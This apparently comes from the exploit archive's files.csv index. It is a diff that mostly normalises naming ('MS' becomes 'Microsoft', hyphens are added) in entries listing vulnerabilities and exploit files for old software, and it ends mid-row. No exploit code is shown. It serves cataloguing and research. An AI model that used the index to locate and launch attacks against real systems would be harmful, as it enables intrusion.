20947,platforms/windows/remote/20947.txt,"1C: Arcadia Internet Store 1.0 Arbitrary File Disclosure Vulnerability",2001-06-21,ViperSV,windows,remote,0 20948,platforms/windows/remote/20948.txt,"1C: Arcadia Internet Store 1.0 Show Path Vulnerability",2001-06-21,ViperSV,windows,remote,0 20949,platforms/windows/dos/20949.c,"1C: Arcadia Internet Store 1.0 - Denial of Service Vulnerability",2001-06-21,"NERF Security",windows,dos,0 -20950,platforms/windows/remote/20950.c,"MS Visual Studio RAD Support Buffer Overflow Vulnerability",2001-06-21,"NSFOCUS Security Team",windows,remote,0 -20951,platforms/windows/remote/20951.pm,"MS Visual Studio RAD Support Buffer Overflow Vulnerability (metasploit)",2001-06-21,"NSFOCUS Security Team",windows,remote,0 +20950,platforms/windows/remote/20950.c,"Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability",2001-06-21,"NSFOCUS Security Team",windows,remote,0 +20951,platforms/windows/remote/20951.pm,"Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability (metasploit)",2001-06-21,"NSFOCUS Security Team",windows,remote,0 20952,platforms/linux/dos/20952.c,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (1)",2001-06-21,"Luca Ercoli",linux,dos,0 20953,platforms/linux/remote/20953.c,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (2)",2001-06-21,mu-b,linux,remote,0 20954,platforms/linux/remote/20954.pl,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (3)",2006-10-06,mu-b,linux,remote,0 20955,platforms/windows/dos/20955.pl,"Internet Download Manager All Versions - Memory Corruption Vulnerability",2012-08-31,Dark-Puzzle,windows,dos,0 20956,platforms/php/webapps/20956.txt,"vBulletin Yet Another Awards System 4.0.2 - SQL Injection",2012-08-31,Backsl@sh/Dan,php,webapps,0 -20957,platforms/windows/dos/20957.pl,"WarFTP Daemon 1.82 RC 11 Remote Format String Vulnerability",2012-08-31,coolkaveh,windows,dos,0 -20959,platforms/windows/webapps/20959.py,"OTRS Open Technology Real Services 3.1.8 and 3.1.9 XSS Vulnerability",2012-08-31,"Mike Eduard",windows,webapps,0 +20957,platforms/windows/dos/20957.pl,"WarFTP Daemon 1.82 RC 11 - Remote Format String Vulnerability",2012-08-31,coolkaveh,windows,dos,0 +20959,platforms/windows/webapps/20959.py,"OTRS Open Technology Real Services 3.1.8 and 3.1.9 - XSS Vulnerability",2012-08-31,"Mike Eduard",windows,webapps,0 20960,platforms/unix/local/20960.c,"Juergen Schoenwaelder scotty 2.1.x ntping Buffer Overflow Vulnerability",2001-06-13,"Larry W. Cashdollar",unix,local,0 20961,platforms/unix/local/20961.sh,"KDE KTVision 0.1 File Overwrite Vulnerability",2001-06-21,IhaQueR,unix,local,0 20962,platforms/unix/local/20962.pl,"cfingerd 1.4.1/1.4.2/1.4.3 Utilities Buffer Overflow Vulnerability (1)",2001-06-21,teleh0r,unix,local,0 @@ -18235,7 +18235,7 @@ id,file,description,date,author,platform,type,port 20969,platforms/solaris/local/20969.c,"Solaris 8 libsldap Buffer Overflow Vulnerability (1)",2001-06-26,noir,solaris,local,0 20970,platforms/solaris/local/20970.c,"Solaris 8 libsldap Buffer Overflow Vulnerability (2)",2001-06-27,Fyodor,solaris,local,0 20971,platforms/windows/dos/20971.txt,"Adobe Photoshop CS6 PNG Parsing Heap Overflow",2012-09-01,"Francis Provencher",windows,dos,0 -20972,platforms/multiple/remote/20972.txt,"Icecast 1.1.x/1.3.x Directory Traversal Vulnerability",2001-06-26,gollum,multiple,remote,0 +20972,platforms/multiple/remote/20972.txt,"Icecast 1.1.x/1.3.x - Directory Traversal Vulnerability",2001-06-26,gollum,multiple,remote,0 20973,platforms/multiple/remote/20973.txt,"Icecast 1.1.x/1.3.x Slash File Name Denial of Service Vulnerability",2001-06-26,gollum,multiple,remote,0 20974,platforms/solaris/local/20974.c,"Solaris 2.6/2.6/7.0/8 whodo Buffer Overflow Vulnerability",2001-06-01,"Pablo Sor",solaris,local,0 20975,platforms/hardware/remote/20975.pl,"Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access Vulnerability (1)",2001-06-27,cronos,hardware,remote,0 @@ -18258,7 +18258,7 @@ id,file,description,date,author,platform,type,port 20992,platforms/linux/local/20992.c,"Lmail 2.7 Temporary File Race Condition Vulnerability",2001-07-04,"Charles Stevenson",linux,local,0 20993,platforms/unix/remote/20993.c,"XFree86 X11R6 3.3 XDM Session Cookie Guessing Vulnerability",2001-06-24,"ntf & sky",unix,remote,0 20994,platforms/linux/remote/20994.txt,"Cobalt Raq3 PopRelayD Arbitrary SMTP Relay Vulnerability",2001-07-04,"Andrea Barisani",linux,remote,0 -20995,platforms/php/webapps/20995.txt,"cobalt qube webmail 1.0 - Directory Traversal vulnerability",2001-07-05,kf,php,webapps,0 +20995,platforms/php/webapps/20995.txt,"cobalt qube webmail 1.0 - Directory Traversal Vulnerability",2001-07-05,kf,php,webapps,0 20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 File Disclosure Vulnerability",2001-07-06,"karol _",php,webapps,0 20997,platforms/multiple/dos/20997.c,"HP-UX 11,Linux kernel 2.4,Windows 2000/NT 4.0,IRIX 6.5 Small TCP MSS DoS",2001-07-07,"Darren Reed",multiple,dos,0 20998,platforms/linux/remote/20998.c,"xloadimage 4.1 - Buffer Overflow Vulnerability",2001-07-10,"zenith parsec",linux,remote,0 @@ -18271,21 +18271,21 @@ id,file,description,date,author,platform,type,port 21005,platforms/php/webapps/21005.txt,"admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0 21006,platforms/windows/dos/21006.txt,"MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2 & 5.2.1 - File Scanner Malicious Archive DoS",2001-07-12,"Michel Arboi",windows,dos,0 21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition (add_rating.php, id parameter) Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 -21008,platforms/cgi/remote/21008.txt,"interactive story 1.3 - Directory Traversal vulnerability",2001-07-15,qDefense,cgi,remote,0 +21008,platforms/cgi/remote/21008.txt,"interactive story 1.3 - Directory Traversal Vulnerability",2001-07-15,qDefense,cgi,remote,0 21009,platforms/windows/remote/21009.c,"ArGoSoft FTP Server 1.2.2 .2 Weak Password Encryption Vulnerability",2001-07-12,byterage,windows,remote,0 21010,platforms/linux/local/21010.sh,"XFree86 X11R6 3.3.2 XMan ManPath Environment Variable Buffer Overflow",2001-06-11,kf,linux,local,0 21011,platforms/hardware/remote/21011.pl,"3Com SuperStack II PS Hub 40 TelnetD Weak Password Protection Vulnerability",2001-07-12,Siberian,hardware,remote,0 21012,platforms/multiple/dos/21012.c,"ID Software Quake 1.9 - Denial of Service Vulnerability",2001-07-17,"Andy Gavin",multiple,dos,0 21014,platforms/linux/local/21014.c,"Slackware 7.0/7.1/8.0 - Manual Page Cache File Creation Vulnerability",2001-07-17,josh,linux,local,0 21015,platforms/hardware/remote/21015.pl,"Check Point Firewall-1 4 SecureRemote Network Information Leak Vulnerability",2001-07-17,"Haroon Meer & Roelof Temmingh",hardware,remote,0 -21016,platforms/windows/remote/21016.c,"ID Software Quake 3 ""smurf attack"" Denial of Service vulnerability",2001-07-17,"Andy Gavin",windows,remote,0 +21016,platforms/windows/remote/21016.c,"ID Software Quake 3 ""smurf attack"" Denial of Service Vulnerability",2001-07-17,"Andy Gavin",windows,remote,0 21017,platforms/linux/remote/21017.txt,"Squid Web Proxy 2.3 Reverse Proxy Vulnerability",2001-07-18,"Paul Nasrat",linux,remote,0 21018,platforms/unix/remote/21018.c,"Solaris 2.x/7.0/8,IRIX 6.5.x,OpenBSD 2.x,NetBSD 1.x,Debian 3,HP-UX 10 Telnetd Buffer Overflow",2001-07-18,Dvorak,unix,remote,0 21019,platforms/linux/remote/21019.txt,"Horde 1.2.x/2.1.3 and Imp 2.2.x/3.1.2 File Disclosure Vulnerability",2001-07-13,"Caldera Open Linux",linux,remote,0 21020,platforms/multiple/local/21020.c,"NetWin DMail 2.x,SurgeFTP 1.0/2.0 Weak Password Encryption Vulnerability",2001-07-20,byterage,multiple,local,0 21021,platforms/unix/remote/21021.pl,"SSH2 3.0 Short Password Login Vulnerability",2001-07-21,hypoclear,unix,remote,0 21022,platforms/php/webapps/21022.txt,"PHPLib Team PHPLIB 7.2 - Remote Script Execution Vulnerability",2001-07-21,"giancarlo pinerolo",php,webapps,0 -21023,platforms/cgi/remote/21023.c,"CGIWrap 2.x/3.x Cross-Site Scripting Vulnerability",2001-07-22,"TAKAGI Hiromitsu",cgi,remote,0 +21023,platforms/cgi/remote/21023.c,"CGIWrap 2.x/3.x - Cross-Site Scripting Vulnerability",2001-07-22,"TAKAGI Hiromitsu",cgi,remote,0 21024,platforms/solaris/local/21024.c,"Solaris 2.6/7.0 DTMail Mail Environment Variable Buffer Overflow Vulnerability",2001-07-24,"NSFOCUS Security Team",solaris,local,0 21025,platforms/multiple/remote/21025.txt,"Proxomitron Naoko-4 Cross-Site Scripting Vulnerability",2001-07-24,"TAKAGI Hiromitsu",multiple,remote,0 21026,platforms/multiple/remote/21026.txt,"Sambar Server 4.4/5.0 pagecount File Overwrite Vulnerability",2001-07-22,kyprizel,multiple,remote,0 @@ -18302,7 +18302,7 @@ id,file,description,date,author,platform,type,port 21038,platforms/php/webapps/21038.txt,"PHP Nuke 5.0 'user.php' Form Element Substitution Vulnerabilty",2001-07-27,dinopio,php,webapps,0 21039,platforms/windows/remote/21039.pl,"SimpleServer:WWW 1.0.7/1.0.8/1.13 Hex Encoded URL Directory Traversal Vulnerability",2001-07-26,THRAN,windows,remote,0 21040,platforms/windows/remote/21040.txt,"Windows 98 ARP Denial of Service Vulnerability",2001-07-30,"Paul Starzetz",windows,remote,0 -21041,platforms/multiple/dos/21041.txt,"MS IE 3/4/5,Netscape Communicator 4 IMG Tag DoS Vulnerability",2001-06-19,"John Percival",multiple,dos,0 +21041,platforms/multiple/dos/21041.txt,"Microsoft Internet Explorer 3/4/5,Netscape Communicator 4 IMG Tag DoS Vulnerability",2001-06-19,"John Percival",multiple,dos,0 21042,platforms/multiple/dos/21042.txt,"id Software Quake 3 Arena Server 1.29 Possible Buffer Overflow Vulnerability",2001-07-29,Coolest,multiple,dos,0 21043,platforms/linux/local/21043.c,"GNU findutils 4.0/4.1 Locate Arbitrary Command Execution Vulnerability",2001-08-01,"Josh Smith",linux,local,0 21044,platforms/windows/local/21044.c,"Oracle 8/9i DBSNMP Oracle Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",windows,local,0 @@ -18310,13 +18310,13 @@ id,file,description,date,author,platform,type,port 21046,platforms/php/webapps/21046.txt,"phpBB 1.4 - Remote SQL Query Manipulation Vulnerability",2001-08-03,kill-9,php,webapps,0 21047,platforms/windows/dos/21047.txt,"Microsoft Windows NT 4.0 NT4ALL DoS Vulnerability",2001-08-03,hypoclear,windows,dos,0 21048,platforms/cgi/dos/21048.txt,"John O'Fallon Responder.cgi 1.0 DoS Vulnerability",1999-04-09,Epic,cgi,dos,0 -21049,platforms/linux/remote/21049.c,"NCSA httpd 1.x Buffer Overflow Vulnerability (1)",1997-04-23,savage,linux,remote,0 -21050,platforms/linux/remote/21050.c,"NCSA httpd 1.x Buffer Overflow Vulnerability (2)",1995-02-17,Xtremist,linux,remote,0 +21049,platforms/linux/remote/21049.c,"NCSA httpd 1.x - Buffer Overflow Vulnerability (1)",1997-04-23,savage,linux,remote,0 +21050,platforms/linux/remote/21050.c,"NCSA httpd 1.x - Buffer Overflow Vulnerability (2)",1995-02-17,Xtremist,linux,remote,0 21052,platforms/jsp/webapps/21052.txt,"jira 4.4.3, greenhopper < 5.9.8 - Multiple Vulnerabilities",2012-09-04,"Hoyt LLC Research",jsp,webapps,0 21053,platforms/multiple/webapps/21053.txt,"Splunk <= 4.3.3 Arbitrary File Read",2012-09-04,"Marcio Almeida",multiple,webapps,0 21054,platforms/php/webapps/21054.txt,"Support4Arabs Pages 2.0 - SQL Injection Vulnerability",2012-09-04,L0n3ly-H34rT,php,webapps,0 21056,platforms/php/webapps/21056.txt,"Group Office Calendar (calendar/json.php) SQL Injection",2012-09-04,"Chris Cooper",php,webapps,0 -21057,platforms/windows/remote/21057.txt,"MS IIS 4/5/6 Internal IP Address/Internal Network Name Disclosure Vulnerability",2001-08-08,"Marek Roy",windows,remote,0 +21057,platforms/windows/remote/21057.txt,"Microsoft IIS 4/5/6 Internal IP Address/Internal Network Name Disclosure Vulnerability",2001-08-08,"Marek Roy",windows,remote,0 21058,platforms/solaris/local/21058.c,"Solaris 2.6/7/8 SPARC xlock Heap Overflow Vulnerability",2001-08-10,Nsfocus,solaris,local,0 21059,platforms/solaris/local/21059.c,"Solaris 8 x86 xlock Heap Overflow Vulnerability",2001-08-10,Nsfocus,solaris,local,0 21060,platforms/linux/local/21060.c,"Sendmail 8.11/8.12 Debugger Arbitrary Code Execution Vulnerability (1)",2001-08-17,grange,linux,local,0 @@ -18348,7 +18348,7 @@ id,file,description,date,author,platform,type,port 21089,platforms/unix/remote/21089.c,"AOLServer 3 Long Authentication String Buffer Overflow Vulnerability (2)",2001-09-05,qitest1,unix,remote,0 21090,platforms/windows/local/21090.txt,"CuteFTP 4.2 Default Weak Password Encoding Vulnerability",2001-08-23,"E. van Elk",windows,local,0 21091,platforms/windows/local/21091.txt,"UltraEdit 8.2 FTP Client Weak Password Encryption Vulnerability",2001-08-23,"E. van Elk",windows,local,0 -21092,platforms/hardware/dos/21092.txt,"Cisco CBOS 2.x Multiple TCP Connection Denial of Service Vulnerability",2001-08-23,"Cisco Security",hardware,dos,0 +21092,platforms/hardware/dos/21092.txt,"Cisco CBOS 2.x - Multiple TCP Connection Denial of Service Vulnerability",2001-08-23,"Cisco Security",hardware,dos,0 21093,platforms/aix/remote/21093.c,"AIX 4.1/4.2 pdnsd Buffer Overflow Vulnerability",1999-08-17,"Last Stage of Delirium",aix,remote,0 21094,platforms/aix/local/21094.c,"AIX 4.2/4.3 piomkapqd Buffer Overflow Vulnerability",2000-09-01,"Last Stage of Delirium",aix,local,0 21095,platforms/linux/remote/21095.txt,"RedHat 6.2/7.0/7.1 Lpd Remote Command Execution via DVI Printfilter Configuration Error",2001-08-27,"zenith parsec",linux,remote,0 @@ -18370,8 +18370,8 @@ id,file,description,date,author,platform,type,port 21112,platforms/linux/remote/21112.php,"Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability",2001-09-12,"Gabriel A Maggiotti",linux,remote,0 21113,platforms/windows/remote/21113.txt,"Microsoft Index Server 2.0 File Information and Path Disclosure Vulnerability",2001-09-14,"Syed Mohamed",windows,remote,0 21114,platforms/freebsd/local/21114.txt,"FreeBSD 4.3/4.4 Login Capabilities Privileged File Reading Vulnerability",2001-09-17,"Przemyslaw Frasunek",freebsd,local,0 -21115,platforms/multiple/remote/21115.pl,"AmTote Homebet 0 World Accessible Log Vulnerability",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0 -21116,platforms/multiple/remote/21116.pl,"Amtote Homebet 0 Account Information Brute Force Vulnerability",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0 +21115,platforms/multiple/remote/21115.pl,"AmTote Homebet - World Accessible Log Vulnerability",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0 +21116,platforms/multiple/remote/21116.pl,"Amtote Homebet - Account Information Brute Force Vulnerability",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0 21117,platforms/multiple/local/21117.txt,"Progress Database 8.3/9.1 - Multiple Buffer Overflow Vulnerability",2001-10-05,kf,multiple,local,0 21118,platforms/windows/remote/21118.txt,"Microsoft Internet Explorer 5 Zone Spoofing Vulnerability",2001-10-10,"kikkert security",windows,remote,0 21119,platforms/php/webapps/21119.txt,"PostNuke 0.6 Unauthenticated User Login Vulnerability",2001-10-13,anonymous,php,webapps,0 @@ -18390,13 +18390,13 @@ id,file,description,date,author,platform,type,port 21132,platforms/php/webapps/21132.txt,"Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities",2012-09-07,LiquidWorm,php,webapps,0 21133,platforms/php/webapps/21133.txt,"Clipster Video Persistent XSS Vulnerability",2012-09-07,DaOne,php,webapps,0 21134,platforms/hardware/webapps/21134.txt,"Sitecom Home Storage Center Auth Bypass Vulnerability",2012-09-07,"Mattijs van Ommeren",hardware,webapps,0 -21135,platforms/php/webapps/21135.txt,"TestLink 1.9.3 CSRF Vulnerability",2012-09-07,"High-Tech Bridge SA",php,webapps,0 +21135,platforms/php/webapps/21135.txt,"TestLink 1.9.3 - CSRF Vulnerability",2012-09-07,"High-Tech Bridge SA",php,webapps,0 21136,platforms/linux/remote/21136.rb,"Symantec Messaging Gateway 9.5/9.5.1 SSH Default Password Security Bypass Vulnerability",2012-08-30,metasploit,linux,remote,0 21137,platforms/multiple/remote/21137.rb,"HP SiteScope Remote Code Execution",2012-09-08,metasploit,multiple,remote,0 21138,platforms/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload Vulnerability",2012-09-08,metasploit,php,remote,0 21139,platforms/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow",2012-09-08,metasploit,windows,local,0 21141,platforms/linux/dos/21141.txt,"Red Hat TUX 2.1 .0-2 HTTP Server Oversized Host Denial of Service Vulnerability",2001-11-05,"Aiden ORawe",linux,dos,0 -21142,platforms/windows/remote/21142.pl,"Ipswitch WS_FTP Server 1.0.x/2.0.x 'STAT' Buffer Overflow Vulnerability",2001-11-05,andreas,windows,remote,0 +21142,platforms/windows/remote/21142.pl,"Ipswitch WS_FTP Server 1.0.x/2.0.x - 'STAT' Buffer Overflow Vulnerability",2001-11-05,andreas,windows,remote,0 21143,platforms/windows/dos/21143.pl,"Raptor Firewall 4.0/5.0/6.0.x Zero Length UDP Packet Resource Consumption Vulnerability",2001-06-21,"Max Moser",windows,dos,0 21144,platforms/windows/remote/21144.txt,"Microsoft Internet Explorer 5/6 Cookie Disclosure/Modification Vulnerability",2001-11-09,"Jouko Pynnonen",windows,remote,0 21145,platforms/multiple/remote/21145.nasl,"IBM HTTP Server 1.3.x Source Code Disclosure Vulnerability",2001-11-08,"Felix Huber",multiple,remote,0 @@ -18409,13 +18409,13 @@ id,file,description,date,author,platform,type,port 21154,platforms/multiple/remote/21154.pl,"ActivePerl 5.6.1 perlIIS.dll Buffer Overflow Vulnerability (3)",2001-11-15,Sapient2003,multiple,remote,0 21155,platforms/php/remote/21155.txt,"Network Tool 0.2 PHPNuke Addon Metacharacter Filtering Command Execution Vulnerability",2001-11-16,"Cabezon Aurélien",php,remote,0 21156,platforms/windows/remote/21156.txt,"Opera 5.0/5.1 Same Origin Policy Circumvention Vulnerability",2001-11-15,"Georgi Guninski",windows,remote,0 -21157,platforms/php/webapps/21157.txt,"bharat mediratta gallery 1.1/1.2 - Directory Traversal vulnerability",2001-11-19,"Cabezon Aurelien",php,webapps,0 +21157,platforms/php/webapps/21157.txt,"bharat mediratta gallery 1.1/1.2 - Directory Traversal Vulnerability",2001-11-19,"Cabezon Aurelien",php,webapps,0 21158,platforms/linux/local/21158.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make Shell Definition Format String Vulnerability",2001-11-21,IhaQueR@IRCnet,linux,local,0 21159,platforms/linux/local/21159.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make Buffer Overflow Vulnerability",2001-11-21,IhaQueR@IRCnet,linux,local,0 -21160,platforms/multiple/remote/21160.txt,"ibm informix web datablade 3.x/4.1 - Directory Traversal vulnerability",2001-11-22,"Beck Mr.R",multiple,remote,0 +21160,platforms/multiple/remote/21160.txt,"ibm informix web datablade 3.x/4.1 - Directory Traversal Vulnerability",2001-11-22,"Beck Mr.R",multiple,remote,0 21161,platforms/unix/remote/21161.txt,"Wu-Ftpd 2.6 File Globbing Heap Corruption Vulnerability",2001-11-27,"Core Security Technologies",unix,remote,0 -21162,platforms/windows/dos/21162.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 Multiple Denial of Service Vulnerability (1)",2001-11-29,"Alex Hernandez",windows,dos,0 -21163,platforms/windows/dos/21163.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 Multiple Denial of Service Vulnerability (2)",2001-11-29,"Alex Hernandez",windows,dos,0 +21162,platforms/windows/dos/21162.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service Vulnerability (1)",2001-11-29,"Alex Hernandez",windows,dos,0 +21163,platforms/windows/dos/21163.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service Vulnerability (2)",2001-11-29,"Alex Hernandez",windows,dos,0 21164,platforms/windows/remote/21164.txt,"Microsoft Internet Explorer 5.5/6.0 Spoofable File Extensions Vulnerability",2001-11-26,StatiC,windows,remote,0 21165,platforms/php/webapps/21165.txt,"PHPNuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x user.php uname Parameter XSS Vulnerability",2001-12-03,"Cabezon Aurélien",php,webapps,0 21166,platforms/php/webapps/21166.txt,"PHPNuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x modules.php Multiple Parameter XSS Vulnerability",2001-12-03,"Cabezon Aurélien",php,webapps,0 @@ -18433,9 +18433,9 @@ id,file,description,date,author,platform,type,port 21178,platforms/windows/remote/21178.html,"Brian Dorricott MAILTO 1.0.7-9 Unauthorized Mail Server Use Vulnerability",2001-12-11,http-equiv,windows,remote,0 21179,platforms/solaris/remote/21179.pl,"Solaris 2.x/7.0/8 Derived 'login' Buffer Overflow Vulnerability",2003-01-09,snooq,solaris,remote,0 21180,platforms/solaris/remote/21180.c,"Solaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability",2004-12-04,"Marco Ivaldi",solaris,remote,0 -21181,platforms/multiple/dos/21181.txt,"MS IE 6.0,Mozilla 0.9.6,Opera 5.1 Image Count Denial of Service Vulnerability",2001-12-11,"Pavel Titov",multiple,dos,0 +21181,platforms/multiple/dos/21181.txt,"Microsoft Internet Explorer 6.0,Mozilla 0.9.6,Opera 5.1 Image Count Denial of Service Vulnerability",2001-12-11,"Pavel Titov",multiple,dos,0 21182,platforms/novell/remote/21182.txt,"Novell Groupwise 5.5/6.0 Servlet Gateway Default Authentication Vulnerability",2001-12-15,"Adam Gray",novell,remote,0 -21183,platforms/cgi/remote/21183.txt,"webmin 0.91 - Directory Traversal vulnerability",2001-12-17,"A. Ramos",cgi,remote,0 +21183,platforms/cgi/remote/21183.txt,"webmin 0.91 - Directory Traversal Vulnerability",2001-12-17,"A. Ramos",cgi,remote,0 21184,platforms/cgi/webapps/21184.txt,"Agora.CGI 3.x/4.0 Debug Mode Cross-Site Scripting Vulnerability",2001-12-17,"Tamer Sahin",cgi,webapps,0 21185,platforms/unix/remote/21185.sh,"QPopper 4.0.x PopAuth Trace File Shell Command Execution Vulnerability",2001-12-18,IhaQueR,unix,remote,0 21186,platforms/hardware/remote/21186.txt,"ZyXEL Prestige 681 SDSL Router IP Fragment Reassembly Vulnerability",2001-12-18,"Przemyslaw Frasunek",hardware,remote,0 @@ -18448,7 +18448,7 @@ id,file,description,date,author,platform,type,port 21193,platforms/multiple/remote/21193.txt,"DeleGate 7.7.1 Cross-Site Scripting Vulnerability",2001-12-28,"SNS Research",multiple,remote,0 21194,platforms/cgi/remote/21194.txt,"Abe Timmerman zml.cgi File Disclosure Vulnerability",2001-12-31,blackshell,cgi,remote,0 21195,platforms/windows/remote/21195.txt,"Microsoft Internet Explorer 5/6 GetObject File Disclosure Vulnerability",2002-01-01,"Georgi Guninski",windows,remote,0 -21196,platforms/windows/remote/21196.txt,"AOL Instant Messenger 4.x Remote Buffer Overflow",2002-01-02,"Matt Conover",windows,remote,0 +21196,platforms/windows/remote/21196.txt,"AOL Instant Messenger 4.x - Remote Buffer Overflow",2002-01-02,"Matt Conover",windows,remote,0 21197,platforms/multiple/remote/21197.txt,"BSCW 3.4/4.0 Insecure Default Installation Vulnerability",2002-01-03,"Thomas Seliger",multiple,remote,0 21198,platforms/windows/remote/21198.html,"Microsoft Internet Explorer 5 JavaScript Local File Enumeration Vulnerability (1)",2002-01-03,"Tom Micklovitch",windows,remote,0 21199,platforms/windows/remote/21199.txt,"Microsoft Internet Explorer 5 JavaScript Local File Enumeration Vulnerability (2)",2002-01-03,"Liu Die",windows,remote,0 @@ -18481,7 +18481,7 @@ id,file,description,date,author,platform,type,port 21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 Unclean Environment Variable Root Program Execution Vulnerability",2002-01-14,"Charles Stevenson",linux,local,0 21228,platforms/windows/remote/21228.c,"Sambar Server 5.1 Sample Script Denial of Service Vulnerability",2002-02-06,"Tamer Sahin",windows,remote,0 21229,platforms/linux/local/21229.txt,"AT 3.1.8 - Formatted Time Heap Overflow Vulnerability",2002-01-16,"SuSE Security",linux,local,0 -21230,platforms/php/webapps/21230.txt,"PHPNuke 4.x/5.x Remote Arbitrary File Include Vulnerability",2002-01-16,"Handle Nopman",php,webapps,0 +21230,platforms/php/webapps/21230.txt,"PHPNuke 4.x/5.x - Remote Arbitrary File Include Vulnerability",2002-01-16,"Handle Nopman",php,webapps,0 21231,platforms/linux/local/21231.c,"Chinput 3.0 Environment Variable Buffer Overflow Vulnerability",2002-01-16,xperc,linux,local,0 21232,platforms/multiple/dos/21232.c,"Oracle 8i dbsnmp Command Remote Denial of Service Vulnerability",2002-01-17,benjurry,multiple,dos,0 21233,platforms/php/webapps/21233.txt,"PHPNuke 4.x/5.x SQL_Debug Information Disclosure Vulnerability",2002-01-18,zataz.com,php,webapps,0 @@ -18492,7 +18492,7 @@ id,file,description,date,author,platform,type,port 21238,platforms/osx/remote/21238.txt,"Apple MacOS Internet Explorer 3/4/5 File Execution Vulnerability",2002-01-22,"Jass Seljamaa",osx,remote,0 21239,platforms/unixware/local/21239.sh,"Caldera UnixWare 7.1.1 WebTop SCOAdminReg.CGI Arbitrary Command Execution Vulnerability",2002-01-20,jGgM,unixware,local,0 21240,platforms/windows/dos/21240.txt,"Microsoft Windows XP .Manifest Denial of Service Vulnerability",2002-01-21,mosestycoon,windows,dos,0 -21241,platforms/php/webapps/21241.txt,"WikkiTikkiTavi 0.x Remote File Include Vulnerability",2002-01-02,"Scott Moonen",php,webapps,0 +21241,platforms/php/webapps/21241.txt,"WikkiTikkiTavi 0.x - Remote File Include Vulnerability",2002-01-02,"Scott Moonen",php,webapps,0 21242,platforms/linux/remote/21242.c,"rsync 2.3/2.4/2.5 Signed Array Index Remote Code Execution Vulnerability",2002-01-25,sorbo,linux,remote,0 21243,platforms/hardware/remote/21243.pl,"Alteon AceDirector Half-Closed HTTP Request IP Address Revealing Vulnerabililty",2001-12-20,"Dave Plonka",hardware,remote,0 21244,platforms/unix/local/21244.pl,"Tarantella Enterprise 3 gunzip Race Condition Vulnerability",2002-02-08,"Larry Cashdollar",unix,local,0 @@ -18517,7 +18517,7 @@ id,file,description,date,author,platform,type,port 21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (1)",2002-02-03,"Dave Wilson",php,remote,0 21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (2)",2002-02-03,anonymous,php,remote,0 21266,platforms/php/remote/21266.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (3)",2002-02-03,anonymous,php,remote,0 -21267,platforms/php/webapps/21267.txt,"Subrion CMS 2.2.1 CSRF Add Admin Exploit",2012-09-12,LiquidWorm,php,webapps,0 +21267,platforms/php/webapps/21267.txt,"Subrion CMS 2.2.1 - CSRF Add Admin Exploit",2012-09-12,LiquidWorm,php,webapps,0 21268,platforms/hardware/remote/21268.py,"Sitecom MD-25x Multiple Vulnerabilities Reverse Root Shell Exploit",2012-09-12,"Mattijs van Ommeren",hardware,remote,0 21269,platforms/php/webapps/21269.txt,"Webify eDownloads Cart Arbitrary File Deletion Vulnerability",2012-09-12,JIKO,php,webapps,0 21270,platforms/php/webapps/21270.txt,"Webify Business Directory Arbitrary File Deletion Vulnerability",2012-09-12,JIKO,php,webapps,0 @@ -18541,8 +18541,8 @@ id,file,description,date,author,platform,type,port 21288,platforms/multiple/local/21288.txt,"Sawmill 6.2.x AdminPassword Insecure Default Permissions Vulnerability",2002-02-11,darky0da,multiple,local,0 21289,platforms/linux/remote/21289.c,"Ettercap 0.6.3 .1 Large Packet Buffer Overflow Vulnerability",2002-02-14,"Fermín J. Serna",linux,remote,0 21290,platforms/unix/local/21290.sh,"Tarantella Enterprise 3 Symbolic Link Vulnerability",2002-02-19,"Larry W. Cashdollar",unix,local,0 -21291,platforms/windows/remote/21291.pl,"phusion webserver 1.0 - Directory Traversal vulnerability (1)",2002-02-16,"Alex Hernandez",windows,remote,0 -21292,platforms/windows/remote/21292.pl,"phusion webserver 1.0 - Directory Traversal vulnerability (2)",2002-02-16,"Alex Hernandez",windows,remote,0 +21291,platforms/windows/remote/21291.pl,"phusion webserver 1.0 - Directory Traversal Vulnerability (1)",2002-02-16,"Alex Hernandez",windows,remote,0 +21292,platforms/windows/remote/21292.pl,"phusion webserver 1.0 - Directory Traversal Vulnerability (2)",2002-02-16,"Alex Hernandez",windows,remote,0 21293,platforms/windows/dos/21293.pl,"Phusion Webserver 1.0 Long URL Denial of Service Vulnerability",2002-02-16,"Alex Hernandez",windows,dos,0 21294,platforms/windows/remote/21294.c,"Phusion Webserver 1.0 Long URL Buffer Overflow Vulnerability",2002-02-16,"Alex Hernandez",windows,remote,0 21295,platforms/multiple/remote/21295.txt,"GNUJSP 1.0 File Disclosure 